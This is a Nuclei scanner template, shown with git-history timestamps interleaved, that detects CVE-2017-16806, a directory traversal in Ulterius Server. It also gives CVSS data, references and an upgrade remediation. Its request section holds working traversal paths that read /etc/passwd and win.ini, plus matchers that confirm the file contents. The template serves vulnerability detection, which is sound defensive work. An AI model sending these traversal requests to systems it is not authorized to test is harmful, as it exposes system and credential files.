nuclei-templates/http/cves/2017/CVE-2017-16806.yaml

49 lines
1.6 KiB
YAML
Raw Normal View History

2021-07-06 19:50:32 +00:00
id: CVE-2017-16806
info:
name: Ulterius Server < 1.9.5.0 - Directory Traversal
author: geeknik
severity: high
description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.
2023-09-06 13:22:34 +00:00
remediation: |
Upgrade Ulterius Server to version 1.9.5.0 or later to mitigate the directory traversal vulnerability.
reference:
- https://www.exploit-db.com/exploits/43141
- https://nvd.nist.gov/vuln/detail/CVE-2017-16806
- https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee
- https://www.exploit-db.com/exploits/43141/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-16806
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.07055
epss-percentile: 0.93195
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: ulterius
product: ulterius_server
tags: cve2017,ulterius,traversal,edb,cve
2021-07-06 19:50:32 +00:00
http:
2021-07-06 19:50:32 +00:00
- method: GET
path:
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"
matchers-condition: and
matchers:
- type: regex
2023-07-11 19:49:27 +00:00
part: body
2021-07-06 19:50:32 +00:00
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-07-06 19:50:32 +00:00
- "\\[(font|extension|file)s\\]"
condition: or
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a004730450221009406da77d619080358f44b1ac28451e9c3e3aa34b000d28d0aad0239df8eceeb0220535d3327561535145045c45a7a121578983f68248e93754023882dd281fb6f67:922c64590222798bb761d5b6d8e72950